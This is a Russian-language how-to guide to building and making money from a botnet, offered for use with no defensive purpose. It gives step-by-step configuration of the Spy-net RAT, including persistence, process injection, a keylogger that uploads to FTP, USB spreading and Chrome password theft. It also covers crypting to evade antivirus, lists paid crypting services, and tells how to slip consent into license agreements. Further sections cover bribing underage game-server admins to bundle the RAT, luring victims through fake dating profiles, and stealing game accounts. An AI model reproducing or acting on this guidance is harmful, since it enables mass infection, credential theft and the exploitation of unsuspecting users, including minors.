Ботнет

АВ – антивирус

Ботнет — Это сеть из роботов. Боты это заражёные нами компы, чьи хозяева обычно не подозревают о инфецировании собственного компьютера. Из данных роботов строится сеть которая управляется одним юзером, т.е нами. Управление происходит через администратор панель бэкдора, которая может находится как на хостинге так и у нас на компьютере.

Бэкдор — Это наш главный инструмент при помощи которого мы и будем управлять
чужими компьютерами. Перевод как (back door) — «чёрный ход» о многом гласит. В
первую очередь это вирус, предназначение которого скрытно установится на компьютер
жертвы с послдеющей возможностью управления данного компьютера.

Криптование — В нашем случае это шифрование кода бэкдора которое делает
неприметным наш вирус для защитных программ таких как АВ, фаерволы и т.д.
Криптование может делается посредсвам специальной программки (криптор), или
ручным методом.

Джойнер — Это программка при помощи которой мы склеиваем наш бэкдор с хоть каким
другим файлом. Например, склеили мы наш бэкдор с изображением, таким макаром при
запуске такового файла сразу раскроется изображение и скрытно запустится
бэкдор.

Стаб (Stub) – принципиальная часть кода криптора. Во время шифрования, по определённому
методу криптованный файл прописывается в качестве ресурсов стаба и сохраняется.

Выходит так, что готовый закриптованный файл это тот же стаб который, во время
пуска отыскивает в ресурсах данные, которые мы закриптовали, расшифровывает и
делает их. Проще говоря, стаб выступает в роли оболочки для защиты от АВ.

Сигнатура – набор б, по которым АВ определяет, заражён ли файл либо нет. Конкретно
изменение сигнатур делает вирус неприметным для АВ.

СОЗДАНИЕ БЭКДОРА

Чтож, сейчас приступим к созданию нашего бэкдора. Для этого нам пригодится Spy-net 2.7 RAT. Spy-net это клиент-серверная программка для укрытого удалённого администрирования. Бэкдор будет состоять из 2ух частей — клиент и сервер. Сервер будет находится на компьютерах жертв а при помощи нашего клиента мы будем производить управление машины нашей жертвы. Открываем Spy-net. Пред нами клиентская часть. Сделаем сервер при помощи которого мы будем управлять компьютерами жертв. Жмём START. Если меню не на британском то делаем так:

Ботнет

Для сотворения сервера избираем «File» -> «Create server» Появилось окно, где мы будем создавать собственный профиль. Каждый профиль может иметь свои опции. Удаляем все излишние профили. Жмем на кнопу «New» и возникает окно ввода профиля. Именовать собственный профиль сможете как вам вздумается, роли это не играет.

Ботнет

Удаляем все записи в таблице. Жмём кнопку «Add» и возникает окошко где мы должны ввести IP и порт.

Ботнет

Этот момент разглядим более детально.

IP.

Где брать IP адресс.

— Можно приобрести дедик и использовать его IP
— Если у вас статичный IP сможете использовать собственный IP
— Если же у вас оживленный IP можно использовать сервис No-ip.com.

Сервис No-ip.

(Если вы решили использовать IP дедика либо же собственный, то сможете пропустить данный
пункт). Зачем нам нужен сервис No-ip? Данный сервис служит для преобразования динамического IP в статический с помощью специального софта этого сервиса. Софт синхронизирует наш IP со спец. доменом который мы выдумали при регистрации в сервисе. Данный домен ссылается на наш IP и когда наш IP изменяется то софт синхронизирует новый IP с сервером. В конечном итоге выходит что при смене нашего IP мы всегда будем доступны по одному домену. 1-ое что нам нужно сделать это зарегестрироватся. Перебегаем на веб-сайт — http://www.noip.com.

Жмём на «Sign up now»

Ботнет

Попадаем на страничку регистрации, поля заполняем как обычно, логин, пароль, мыло
(используйте лучше забугорные сервисы — gmail,яху и т.д) Дальше вводим заглавие нашего домена, у сервиса бесплатные домены исключительно в зоне noip.biz

Избрали заглавие для домена, сейчас жмём под столбиком «Free DNS» -> «Sign UP»

Ботнет

Нам на мыло приходит письмо с подверждением. Для активации перебегаем по ссылке в письме. Всё сейчас наш акк активирован.

Жмём на вкладку «Download»

Ботнет

Дальше «Download Now» Скачался, запускаем установочник.

Запускаем софт. Вводим наш Email и пароль которые мы указывали при регистрации.
Софт авторизировался. Сейчас жмем на кнопку «Edit Hosts»

Ботнет

Избираем наш домен и сохраняем нажатием на кнопку «Save» Если всё верно выполнено, то должно смотреться так:

Ботнет

Если же у вас по другому то необходимо попробывать избрать другую сетевую карту. Для этого жмём «File» -> «Preferences» Под строчкой «network adapter» выбираете другую сетевую карту. Если же всё-равно на одном из пт красноватый крест, то можно в тех же настройках под строчкой «IP Detections Method» поставить галочку в пт «use alternative IP detection method»

Порты.

После ввода IP нам нужно ввести порт. А лучше несколько. Можно воспользоватся стандартными портами. Но у многих может быть пользующиеся популярностью порты закрыты провайдером. Для того что бы осознать какие же порты у нас открыты есть несколько способов.

1. Скачиваем и запускаем программку DoScan, она прилагается к курсу. Нам нужна вкладка «Экспресс-сканирование», она сразу раскрывается при запуске. В поле «IP адресок» вписываем наш IP.

Дальше в поля «Исходный порт» и «Конечный порт» указываем спектр поиска портов.
Укажем от 1 до 50000. Думаю больше нам не нужно.

Ботнет

Жмём на кнопку «Исследовать» После сканирования получаем перечень применяемых портов.

Ботнет

Сейчас их нужно проверить. Идём на веб-сайт — http://2ip.ru В меню избираем вкладку «Проверка порта»

Ботнет

В поле вводим по одному все порты которые нам выдал DoScan. Если пишет что порт закрыт, можно сходу его отсеивать. Использовать необходимо все открытые порты.

2. Сканирование портов с помощью инструмента веб-сайта — http://hideme.ru Перебегаем на веб-сайт, избираем в меню «Все инструменты» дальше «Сканер портов»

Ботнет

В поле вводим собственный IP, избираем пользующиеся популярностью порты и сканируем. Так же лучше проверить их на веб-сайте 2ip.

Итак, сейчас когда мы разобрались с IP и портами, вернёмся к нашему Spy-net. Вводим в это окошко IP и порт.

Ботнет

Лучше ввести несколько портов. Дальше у нас поля Identification и Password В поле Identification вводим наш ID, можно ввести имя распространяемого файла либо ваш логин, ососбого значения это поле не имеет, только для вашего удобства. В поле Password соответсвенно вводим пароль.

Ботнет

Дальше перебегаем на вкладку Installation. В данной вкладке настраивается установка сервера.

Ботнет

Пункт Install server — это автозагрузка, если убрать галочку то после перезагрузки компьютера сервер не запустится автоматом на компьютере жертвы. Немного  разглядим опции данной вкладки.

«Installation directory» — определяет местно куда установится наш сервер.
— System — папка «С:/WINDOWS/System32/»
— Windows — папка «С:/WINDOWS/»
— Root — корень загрузочного диска
— Program Files — папка «С:/Program Files/»
— Other — указываем путь вручную.
Справа лицезреем поля «directory» и «File Name»
Directory — это папка куда установится наш сервер
File name — название файла которое присвоит для себя наш сервер
«Inject into» — данная функция вводит процесс сервера в другой процесс и работает от имени этого процесса.
— No inject — Процесс происходит без внедрения.
— Default Browser — Внеедряется в процесс браузера который установлен по дефлоту.
— Other — Указываем вручную процесс в который нужно внедриться.
Снизу имеются дополнительные функции.
— Persistance — данная функция позволяет автоматом восстановится серверу при его обнаружении. К примеру если отыщут и удалят файл сервера, процесс сервера, ключи автозагрузки сервера то они автоматом восстановятся.
— Hide File — Прячет файл сервера
— Change creation date — меняет дату сотворения сервера
— Melt file — самоудаление запускаемого файла
— Mutex — при данной функции исключает возможность пуска 2ой копии сервера.
«Boot» — здесь указываются ключи реестра откда вероятен пуск нашего сервера.

С этой вкладкой мы окончили. Идём дальше.

Вкладка «Message»

Ботнет

Данная функция создана для вывода окна ошибки при запуске сервера жертвой.
Здесь можно избрать иконку ошибки, заголовок и текст. В нашем случае эта функция никчемна и нам она не понадобится. Эта функция полезна только при запуске нагого сервера. Идём далее.

Вкладка «Keylogger»

Ботнет

Данная функция позволяет фиксировать каждое нажатие клашив на клавиатуре жертвы.
Думаю что кейлогер многим знаком.

Под строчкой «Keylogger settings» мы лицезреем 2 пт:
«Delete [BACKSPACE]» — при выбраной функции кейлоггер будет запоминать нажатие
кнопки backspace.
«Send logs bu FTP» — данная фуекция позволяет отправлять логи на собственный FTP-сервер. И ниже приведены отдельные опции:
Send to — имя Ftp=сервера
Directory — папка сервера в которую будут приходить логи
FTP user — логин ftp-сервера
FTP password — пароль от ftp-сервера
Send logs FTP port — порт для отправки логов
Send each — просвет времени через который будут отправлятся логи.
Естественно удобнее что бы логи приходили на FTP.
А мы идём далее.

Вкладка «Anti-debug»

Ботнет

Данная функция защищает от пуска нашего сервера на виртуальных машинах и
отладочных системах. Наш сервер не запустится на тех системах где стоит галочка.
Естественно мы ставим всюду галочки, т.к с виртуальных машин нам не будет толка)

Вкладка «Create server»

Ботнет

Итак кульминация. Оканчивающий шаг. Незначительно разглядим функции данной вкладки.
(Рекомендую поставить опции как на скрине)

«Use icon» — применяет выбраную нами иконку к серверу. Ставим галочку и слева
возникает иконка. Если кникнуть по ней то можно избрать иконку из перечня на выбор.

Нам данная функция не пригодится, т.к мы всё-равно будем склеивать наш сервер с
другим файлом.

«Compress with UPX» — после создание сервера он сжимается упаковщиком файлов —
UPX’ом

«USB Spreader» — Распространение через USB флэшку. Если жертва воткнет флэшку, то
сервер в сокрытом режиме автоматом запишет на неё свою копию.
«p2p Spresder» — Распространение через p2p сети типо DC++
«RootKit» — маскировка сервера и его процесса в памяти.
«Гугл Chrome Password» — кража паролей браузера Гугл Chrome
«Bind files» — Джойнер. При помощи неё мы можем склеить наш сервер с хоть каким другим
файлом.

Жмём «Bind files» и склеиваем с необходимым нам файлом.

Ботнет

Возникает окно клейки, в поле «File» избираем подходящий нам файл.

Жмем на кноку «Add», файл возникает в перечне, ставим галочку.

Все другие характеристики оставляем без конфигураций.

Жмем на «Create server» И создаём наш сервер.

Если всё прошло удачно то появится окно которое спрашивает нас «Желаем ли мы
сохранить текущие опции», опции сможете сохранить.

Сейчас что бы удостоверится что мы всё сделали верно и у нас всё работает лучше проверить наш сервер на для себя.

Идеальнее всего сделать сервер который мы запустим на виртуалке, для этого при разработке сервера во вкладке «Anti-debug» мы убираем все галочки, либо же запускаем у себя на машине и при разработке сервера во вкладке «Installation» убираем галочку с пт — «Install server», таким макаром наш сервер удалится после перезагрузки.

Дальше ОЧЕНЬ Принципиальный момент, в самом клиенте избираем «options»->»select listening ports».

Ботнет

Раскрывается окно где мы прописываем все порты которые мы указывали при разработке
сервера.

Так же вводим пароль который мы указали при разработке профиля, сохраняем. Всё сейчас запускаем наш сервер, раздаётся наизловещий смех (советую отключить его, т.к при внезаптном подключении нового бота многие будут пугаться от неожиданности) и мы появляемся в строке клиента.

Кликнув правой кнопкой мыши по нашего боту, т.е по нам мы лицезреем перечень функций
управления. Перечень достаточно большой и различный потому управление мы разберём в отдельном рукововдстве которое у вас прилагается, а мы идём дальше.

ШИФРОВАНИЕ БЭКДОРА

Бэкдор у нас есть, но этого не достаточно. Пока толку от него нет т.к ни одна антивирусная программка и фаервол его не пропустят. Уповают что у жертвы вполне отключена вся защита не стоит. Что все-таки нам делать?

Для того что бы наш бэкдо был невидим для защитных программ нам необходимо его
зашифровать от их, т.е закриптовать.

Как это делается?

Есть 2 метода:

— Ручной

— Программный

Погружатся в дебри ручного криптования мы не будем, т.к нам на первых порах не
особо необходимо и на это уйдёт уйма времени, как понятно время — средства.
Мы будем рассматривать программный метод криптования.

Крипторы:

Крипторы бывают общественные и приватные. Мы разглядим общественные крипторы.
Криптор – это программка, которая автоматом криптует избранный нами файл.
Пожалуй, важнейшая часть каждого криптора это стаб (что такое стаб вы сможете
почитать на первой страничке).

Красота общественных крипторов в том, что они бесплатны.

Но дело в том, что стаб состоит из сигнатур и конкретно по сигнатурам АВ определяет
заражённость файла.

Чем больше времени криптор находится в общественном доступе, тем больше людей
воспользуются его стабом и тем сигнатуры резвее будут попадать в базы
данных. Проще говоря, закриптованные вирусы общественным криптором живут не очень
длительно, но на некоторое количество дней полностью сойдёт.

Но всё же можно продлить жизнь паблик крипторов, а поточнее их стабов способом очистки сигнатур. Правда, здесь нам потребуются способности ручного криптования. Если кто-то захотит научится, то можно выискать информацию в вебе, благо её сильно много и просто мануалов и видео уроков. Если мы начнём затрагивать способы ручного криптования и, начав учить их, то у многих новичков просто забьются мозги информацией т.к. это уже незапятнанное программирование и предстоящее чтение курса будет просто затруднительным, беря во внимание сколько инфы впереди.

Плюс ко всему ручное криптование это очень затяжной процесс т.к сигнатуры
рассчитываются способом подбора и каждый собственный подбор необходимо инспектировать на палевность.

Если вы используете криптор и большая часть АВ палят ваш бэкдор, то заместо ручного
криптования можно пользоваться способом совмещения стабов. Т. е закриптовали
файл и криптуем его ещё раз другим криптором либо стабом. Можно кооперировать, сколько
желаете, главное всякий раз инспектировать на палевность и глядеть на конфигурации. Если
конфигураций не наблюдается, то криптуем в оборотном порядке либо используем другие
крипторы.

Как проверить наш закриптованный бэкдор на палевность?

1-го АВ будет недостаточно, т.к это не показатель. «На вкус и цвет…» ну вы сообразили и потому все употребляют различные АВ. Не устанавливать же нам все АВ по очереди и инспектировать! Для этого есть особые сервисы:

http://virusscan.jotti.org (22 АВ, бесплатный)
http://chk4me.com (25 АВ, бесплатный)
http://www.file2scan.net (35 АВ, 10$ за месяц)
http://elementscanner.com (35 АВ, условно бесплатный)
http://fullscanner.net (35 АВ, 9$)

P. S: НИКОГДА не используйте для проверок Virus Total (www.virustotal.com), даже если это не конечный вариант вируса либо вы его не будете использовать, сигнатуры попадут в базы данных АВ и хоть какой закриптованный файл таким криптором станет палится на последующий денек.

Нагой бэкдор без криптованияБотнет

Склеенный и закриптованный бэкдор при помощи паблик крипторов способом комбинирования.Ботнет

Где же нам взять паблик крипторы?

Один из самых наилучших вариантов, на мой взор это испанский форум —
http://indetectables.net/viewforum.php?f=7

В разделе – «Nuevos Troyanos y Herramientas» каждый денек выкладываются свежайшие
крипторы.

Но единственным минусом для новичков станет «антинуб» система.(она же и является
плюсом, т.к крипторы хоть и общественные но не все ими сумеют пользоваться)
Некие пароли к архивам зашифрованы и расшифровать их поможет данный веб-сайт —
http://crypo.in.ua/tools/. Так же есть особый программки.

К таким зашифрованным паролям прикладываются подсказки – аббревиатуры
криптографических алгоритмов и языков либо же софт при помощи которых
расшифровывается пароль.

Так же вероятнее всего не все паблик крипторы у вас запустятся, т.к некие из их
написаны с внедрением библиотек которые имеются не у каждого юзера. Об
этом будет свидетельствовать сообщение об ошибке в виде «не найдена библиотека
COMCTL32.OCX». Но это не неувязка т.к необходимо всего скачать файл подходящей
библиотеки и зарегистрировать его через cmd. Как это сделать, более детально можно почитать в вебе, т.к опции для различных версий windows и разрядных систем различные. Какая конкретно библиотека вам нужна можно выяснить из сообщения об ошибке.

Ботнет

В дальнейшем советую приобрести приватный криптор, т.к он прекрасно сберегает наше
время, нервишки и средства. Естественно, можно освоить и ручное криптование, выйдет куда
дешевле, чем получать криптор, но на одно ручное криптование у вас может уйти не один час. Что бы вы успели сделать за этот период времени? Думаю много чего, а криптор сделает это за 1 секунду и с незапятнанным результатом.

Их цена варьируется от 1000р до бесконечности. Солидные крипторы стоят от
10000р. Большой плюс таких крипторов, то что они практически каждый денек обновляются.

Крипт сервисы:

Если вам лень возится с крипторами и у вас имеется маленькой бюджет, то самый
обычный вам вариант будет пользоваться крипт обслуживанием. Обычно все крипт
сервисы криптуют под 0, т.е что бы ни один АВ не сжег опасность. Таких сервисов много, но не они все предоставляют высококачественные услуги (а некие вообщем их не предоставляют, а просто пропадают с вашими средствами)

Испытанные крипт сервисы:

1. Icq: 309994 – 10-15$ за 1 файл. Один из дешёвых крипт сервисов с разноплановой
репутацией. Лично у меня не появлялось заморочек, если что-то было не так, то средства
возвращал.

2. Jabber: cryptpe@ubuntu-jabber.net – 20$ за 1 файл. По цене-качество наилучший
сервис.

3. Jabber: 921914@jabber.cz – стоимость находится в зависимости от файла. Издавна с ним работал, всегда всё
было на высоте, но в ближайшее время изредка бывает в сети.

4. Jabber: crypt4you@jabber.ru – 40$ за 1 файл. Работал с ним ранее, всё устраивало. На данный момент стоимость довольно великовата.

Перед криптованием сообщите селеру на какой базе бэкдор и с чем склеен. После
криптовки так же проверьте на палевность файла, и запускается ли он вообщем. В
неприятном случае просите рекрипт либо возврата средств.

Метод действий:

1. Создаём наш бэкдор и склеиваем его с файлом под которым мы и будем
распространять, лучше с .exe файлом.
2. Получившийся склеиный бэкдор криптуем.
3. Проверяем бэкдор по базам АВ
4. Распространяем
5. Профит
6. Не забываем обновлять бэкдор как минимум раз в неделю.

В конечном итоге получаем файл формата .exe который не палится большинсвом АВ и запускает
наш бэкдор в сокрытом режиме.

Принципиальные Советы:

1. Криптовать следует уже склеенный бэкдор с запускаемым файлом (софтом/игрой).
Если сделать напротив, другими словами возможность что бэкдор будет, палится из-за клейки.

2. После клейки и криптования инспектируйте пуск файла на для себя. Бывает такое что
склейка либо криптование могут разрушить файл, и он закончит запускаться. В таких
случаях следует перекриптовать либо склеить другим джойнером.

3. Бэкдор необходимо обновлять как минимум раз в неделю, в эталоне раз в денек (если желаете не плохих результатов, то обновляйте каждый 1-2 денька)! Под обновлением
предполагается поновой закриптованный бэкдор. Через некое время бэкдор
начинает палится АВ и что бы этого не случилось нашим ботам необходимо всякий раз
обновлять бэкдор.

Обновляется он до боли просто. Создаём новый сервер (бэкдор) с теми же параметрами
который мы распространили либо же берём нагой файл сервера (без клейки) который
мы уже распространили либо перекриптовываем его.

Дальше выделяем всех роботов в клиенте spy-net, избираем пункт – «Send file and — Runhidden»БотнетЛЕГАЛИЗАЦИЯ

Может быть, это понятие несовместимо с ботнетом, но я попробую вас переубедить.
Всё дело в том, что бы принудит юзера добровольно установить наш бэкдор, а
делается это при помощи соглашения, с которым он соглашается.

Незначительно забегая вперёд скажу, что один из способов распространения будет через
инсталл файлы. Практически в каждом исталлере есть лицензионное соглашение.
Конкретно эти лицензионные соглашения нам и необходимо будет редактировать.

Изменение будет касаться оповещения юзера о том, что на его компьютер будет установлено постороннее ПО, на установку которого он должен дать согласие. Кто у нас читает лицензионные соглашения? Верно, никто и естественно он даст своё согласие.

Сейчас всё по порядку.

Есть у нас инсталл файл, с которым мы будем склеивать наш бэкдор. До того как склеивать его с бэкдором, нам необходимо редактировать лицензионное соглашение. Сделать это можно вручную, а если мы будем распространять файл через владельца инсталл файла, то лучше об этом попросить конкретно его самого.

Что конкретно редактировать и где находится в зависимости от пт лицензионного соглашения.
Лучше ввести наше дополнение куда-нибудь в середину соглашения, что бы не
очень оказалось на виду. Текст должен быть оформлен в официально-деловом стиле,
должен соответствовать пт в соглашении и оповещать юзера о том, что он
даёт своё согласие установку нашего бэкдора.

Примеры:

Юзер реальным уведомлен и соглашается, что при использовании
«программы» по мере надобности третьим лицом будет осуществлено
администрирование ПК юзера в удалённом режиме для выполнения нужных
задач.

Пользуясь «программой» вы соглашаетесь с тем, что на ваш компьютер будет
установлено дополнительное программное обеспечение, которое позволит третьему
лицу создавать удалённое администрирование вашего компьютера.

Употребляется данный текст обычно под пт «Общие положения» либо «Условия
использования».

Текст приведён для примера, составить собственный не составит труда.

Главное указать, что юзер соглашается/уведомлён/освящён с тем, что с его
компом будут делается какие-либо деяния с внедрение постороннего ПО
третьим лицом, хотя наверняка можно указать и «правообладателем» ведь никто позже не станет разбираться кто правообладатель, а кто третье лицо.

Всё находится в зависимости от того какого продукта вам необходимо отредактировать соглашение и какие
функции вы будете использовать.

Можно написать более туманно, но не советую.

Сейчас разберем, как нам сделать собственный инсталл файл с лицензионным соглашением.
Для этого нам нужен узнаваемый компилятор – Smart Install Maker. Допустим нам необходимо сделать собственный инсталл файл для какого-нибудь софта.Ботнет

Открываем наш компилятор. 1-ое что мы лицезреем меню «Информация» в нём мы
заполняем поля соответственно самому софту и избираем путь сохранения самого инсталл файла. Дальше нам необходимо меню «Файлы», находим в нижнем правом меню ярлычек с заглавием «Добавить файлы из папки», находим папку с нашим софтом и избираем её. Все файлы из папки автоматом перебросятся в компилятор.

Ботнет

Дальше перебегаем меню «Диалоги». Во вкладке общее в принципе можно всё бросить как есть. Нас интересует вкладка – «Лицензия/Информация». Ставим галочку в пт «Показывать лицензионное соглашение» и избираем путь к файлу с соглашением (если у вас ещё нет лицензионного соглашения, то его можно скачать либо скопировать в текстовой файл и редактировать).

Ботнет

В меню «Интерфейс» избираем и настраиваем дизайн для нашего инсталлера.
Другие менюшки нам не неотклонимы для сотворения обыденного инсталл файла.
В верхнем меню находим ярлычек с заглавием «Компилировать» жмём и наш инсталлер
готов.

Программка очень понятна и ординарна в использовании, при помощи неё вы можете делать
свои репаки (RePack — пиратку) к играм и инсталл файлы к разным программкам
(советую более детально изучить данным компилятор для сотворения репаков).

РАСПРОСТРАНЕНИЕ

От того каким образом вы будете распространять ваш бэкдор будет зависеть
эффективность роста вашего ботнета.

Вариантов распространения бэкдора сильно много, мы разглядим несколько из их.

1. Распространение через игровые лаунчеры.

Мы естественно можем склеить наш бэкдор с игрой и раскидывать её по форумам и другим
площадкам, но поверьте, ожидаемого результата это не принесёт и при всем этом вы
потратите уйму времени.

Для чего нам распространять загрузки, навязывать их юзерам, когда юзер сам найдёт наш файл и скачает его.

Я говорю о распространении через веб-сайты пиратских игровых серверов либо программ.
На этот момент в сети огромное количество многопользовательских игр, а пиратских
серверов этих игр ещё больше. И большая часть админов таких серверов
школьники, что нам и должно сыграть на руку.

Я рекомендую вам начать свои поиски с таких игр как — Minecraft, CS, Lineage 2, WoW, Aion. Практически у каждого пиратского сервера этих игр есть собственный лаунчер, серверов данных игр сильно много и с каждым днём они вырастают.

С чего начать.

1-ое что нам необходимо это отобрать сервера игр, с которыми мы будем склеивать наш
бэкдор. К выбору лучше подойти с некими аспектами:

— наличие у сервера собственного лаунчера
— не плохая популярность сервера
— админ малых лет 😉

Сущность будет, заключатся в том, чтоб условится с администратором сервера о клейки нашего бэкдора с лаунчером их игры.

Например, возьмём игру Minecraft. Находим веб-сайт какого-нибудь сервера по данной игре и пишем админу о том, что у нас к нему есть деловое предложение. Сходу лучше не писать что нам необходимо, пусть лучше ответит. Если же не ответит, означает его не заинтересовывают средства)

В конечном итоге мы должны предложить администратору за вознаграждение (как правило это 500р-1000р)
разрешить склеить наш бэкдор с лаунчером. Естественно лучше сказать что это,
к примеру скрипт по накрутке чего-либо, всё равно он не увидит и не выяснит с чем мы склеиваем лаунчер. Если в лаунчере имеется лицензионное соглашение то, просим
редактировать его что бы всё было согласованно посреди игроков, вас и администратором. Даём
ему наш текст с правками в соглашении, обычно редактирование для него не
составит особенного труда.

Администраторы могут попасться различные, кто-то откажется, кто-то попросит больше средств, кто-то будет длительно мыслить, но если администратор школьник и речь входит о деньгах, то обычно они соглашаются и их даже не интересует что у тебя там за «скрипт».

Можно условится об оплате в месяц, бывали и такие случаи, в любом случае за
месяц ты уже соберёшь неплохую сеть, которой окупишь каждомесячные платежи, с
помощью которых, твоя сеть возрастает.

Лично у меня были очень отличные характеристики с серверов майнкрафта. С 1-го сервера скачек было от 10 до 200 в денек. А таких серверов было несколько.

Так же принципиальный момент, наш бэкдор должен быть чист для всех фаворитных
антивирусных программ таких как — Касперский, NOD, Avast, Dr.Web, Norton, McAfee,
Panda, AVG, Avira, Emsisoft и т.д. А в эталоне он должен быть чист на все 100%. Т. к несколько криков юзеров, что там вирус могут заставить задуматься администратора и других игроков. А такое палево нам не к чему.

Так же нужно раз в неделю поновой закриптовывать наш бэкдор и склеивать с
лаунчером, по другому в скором времени бэкдор начнут палить защитные программки. Этот
момент обговорите с админом.

Распространение бэкдора через игры отлично и выгодно в плане того что
компы игроков в компьютерные игры довольно массивные, что важно к примеру в таком
направлении как майнинг биткоинов.

2. Распространение через игровые бот-программы.

Так же как и пиратских серверов, сильно много различных роботов к данным играм.
Почему конкретно боты? Всё просто, здесь нашей добычей станут акки от официальных
серверов игр, о чём мы побеседуем чуток позднее. Кто незнаком с многопользовательскими играми, бот — это программка, которая совершает какие-либо деяния в игре в автоматическом режиме, т.е без роли игрока. К примеру, собирание ценных вещей, прокачивание персонажа, торговля на аукционе и т.д. Проще говоря, роботов употребляют для автоматического заработка игровой валюты, как понятно эта валюта имеет ценность лишь на офф серверах. Вот поэтому основная масса употребляет роботов на офф серверах.

Я рекомендую использовать роботов к таким играм как — WoW, Aion, Lineage 2, Gueld Wars 2, Diablo III.

Мы будем находить создателей этих роботов либо же админов ресурсов, которые
распространяют паблик/взломанные версии данных роботов.

Отыскать эти ресурсы легко, довольно только ввести в поисковике, к примеру ”бот
WoW”.

Схема общения такая же, как и в первом варианте.

На контакт в главном идут администраторы ресурсов, которые распространяют в бесплатном
доступе данных роботов, т.к доход с их ресурсов не велик, а здесь хоть какое-то
вознаграждение. А вот разработчик бота имеет денежку с его продаж, потому часто их не заинтересовывают подобные предложения, но всё же мне удавалось условится с некими из их.

Один из плюсов данного варианта распространения это то, что при использовании и
скачивании роботов многие отключают все защитные программки т.к практически все из их
расценивают роботов как вредоносную программку. Но это не значит что криптовать наш бэкдор не непременно!

3. Распространение через торрент трэкеры.

Да, наверное многие из вас знают о данном методе либо же сами додумались.
Но будет не излишнем упомянуть о данном способе.

Бэкдор будем распространять снова же через игры.

1-ое что нам необходимо будет сделать это промониторить игровой рынок и выявить
наиблежайшие игровые релизы.

Возьмем, например, известную GTA V.

Есть 2 варианта развития:

1. Мы создаём собственный repack, клеим его с бэкдором и выкладываем на торренты в денек
выхода релиза. Для этого нам необходимо иметь ключ и лицензию игры. т.е предзаказать её. Не будем растрачивать время на рассказ как сделать собственный repack, для этого можно пользоваться smart install maker`ом, к тому же в вебе много руководств и видео уроков.

2. Скачать готовый repack и распространяем с нашим бэкдором по трэкерам. Так
естественно проще, не надо брать игру, не надо растрачивать время на создание repack’a. Но вы потеряете время на скачка repack’a, а это играет огромную роль во время выхода релиза. Бывает такое, что раздача висит пару часиков, а дальше её снимают по требованию правообладателей, но не со всех трэкеров. Здесь уже как вам фортуна улыбнётся. Так же принципиально раз в неделю обновлять нашу раздачу, т.е склеивать репак с поновой закриптованным бэкдором. По другому через 1-2 недели наш репак с бэкдором потихоньку начнут палится защитными программками, юзеры начнут выть в чаты и вашу раздачу прикроют.

4. Распространение через анкеты.

Метод таковой же старый как моя прабабушка.

Сходу желаю вас предупредить, что таким способом мы будем получать низкокачественных роботов, но для раскачки полностью сойдут.

Сущность состоит в том, что бы завлекать похотливых юзеров (а их много) к
нам на странички анкет и вынудить их скачать файл с нашим бэкдором.

Идём Вконтакт либо всякую другую социальную сеть.

Регистрируем анкеты женщин. Размещаем соблазнительные фото, можно в
нижнем белье, но без обнажёнки. Делаем более-менее близкую к реальности анкету, не надо
располагать фото топ-моделей, узнаваемых личностей либо порно актрис.

Начинаем пиарить странички. Рассылаем фото женщин наших анкет в пользующиеся популярностью
группы для знакомств, и пишем под фотками что-то типа «познакомлюсь с мальчиком»,
«мальчики добавляйтесь» и т.д. Другими словами нам необходимо заинтриговать мужчин, чтобы они
перебежали к нам на страничку. Рассылать сообщения можно при помощи особых
программ, к примеру VkBot.

Дальше нам необходимо вынудить скачать наш файл с бэкдорам.

Распространять мы будем под видом архива с эротическими фото девицы с
нашей анкеты. Архив можно заполнить левыми эротическими фото, но это будет
подозрительно, потому на архив ставим пароль и даём всем неверный пароль. А
можно и эротическими фото девицы с нашей анкеты, но отыскать обыденные фото
привлекательной девицы и здесь же её эротические фото, очень трудно. Но можно, и в этом нам может посодействовать — http://pornolab.net/forum/viewforum.php?f=1728

В общем, создаём архив с фото и склеиваем его с нашим бэкдором.

Дальше под фотками в анкете размещаем ссылку на наш архив либо же в статусе пишем
что-то на подобие — «Новые фотки с моего эротического фотосета у меня в ссылках» и размещаем нашу ссылку на архив в разделе «ссылки».

Уделим принципиальный момент ссылке. Если заливать наш архив на хоть какой узнаваемый
файлообменник то лично контакт будет перекрыть все подобные ссылки. Потому
лучше сделать незапятнанный редирект (перенаправление).

Для этого идём на https://nic.reg3.ru, (либо на хоть какой другой веб-сайт по продаже доменов).

Регестрируемся, покупаем самый дешёвый домен в зонах ru, рф. После чего наш домен возникает у нас в перечне. Жмём по нему и мы перебегаем в меню управления доменом. Находим строчку «настройка зоны и переадресации» под ней лицезреем маленькую
менюшку, где ставим точку в пт «Переадресация на сайт» и вводим нашу ссылку
куда будем перенапралять с этого домена, к примеру zalil.ru/123456

Ботнет

В конечном итоге мы получаем беспалевную ссылку, которая перенапраляет юзера на
файлообменник для скачки нашего архива.

К примеру, в ссылках у нас стоит «http://мояфотосессия.рф» кликая по ней юзер перебегает на веб-сайт файлообменника «zalil.ru» где может скачать наш архив.

МОНЕТИЗАЦИЯ

Сейчас у нас есть универсальный и очень действенный инструмент для заработка в
сети. Разгляди некие виды монетизации ботнета.

ПРОДАЖА ИГРОВОЙ ВАЛЮТЫ И АККАУНТОВ

Многие игровые аккаунты оффициальных серверов представляют некую ценность,
а конкретно:

— Сам песонаж. Ценность находится в зависимости от уровня персонажа.
— Игровая валюта.

Продажа игровой валюты.

Метод достаточно рутиный и не очень размеренный, но я начинал конкретно с него. При 10-20 загрузках в денек моего бэкдора я получал от 1к рублей до 10к рублей в денек. Здесь больше находится в зависимости от того как повезёт с аккаунтом.

Наверняка, один из важнейших моментов это найти игру по которой мы будем
специализироватся, естественно можно не заострять внимание на одной игре, а брать всё
что попало к нам в «карман», но это очень не комфортно, поверте!

Для упрощения поиска подходящих нам аккаунтов и расширения круга наших «клиентов»
избираем метод распространения через роботов. Естественно использовать мы будем
бота для той игры, на которую выпал наш выбор.

При помощи данного способа мы будем продавать в игровую валюту.

Для начала рекомендую промониторить рынок и поглядеть валюта, какой игры
является самой дорогой. Достаточно дорогой курс у валюты таких игр как Rift и Guild
Wars 2, но лично я рекомендую работать всё-таки по WoW, т.к населённость данной
игры очень велика, а соотвественно и спрос на валюту.

Сущность будет заключатся в том чтоб входить на акк жертвы и перенаправлять
игровые средства или для себя на акк, или на акк сервиса которому мы продаём валюту.

Разгляди оба варианта:

1. Продаём валюту большим сервисам по продаже валюты, они повсевременно нуждаются в
поставщиках. Сперва нам необходимо снова промониторить эти сервисы и
поглядеть, кто дороже других выкупает валюту. Цены будут ниже, чем они
продают и различны посреди сервисов в несколько рублей, а может и копеек, при больших сделках даже пару копеек принесут значимый прирост.

2. Продавать валюту напряму покупателю. Заместо того чтоб продавать валюту
сервисам-барыгам в 2 а то и в 3 раза дешевле, можно продавать её сходу игрокам. Этот метод просит больше времени, но зато мы будем как минимум в 2 раза больше
зарабатывать.

Для этого нам лучше иметь по несколько персонажей на каждом из серверов
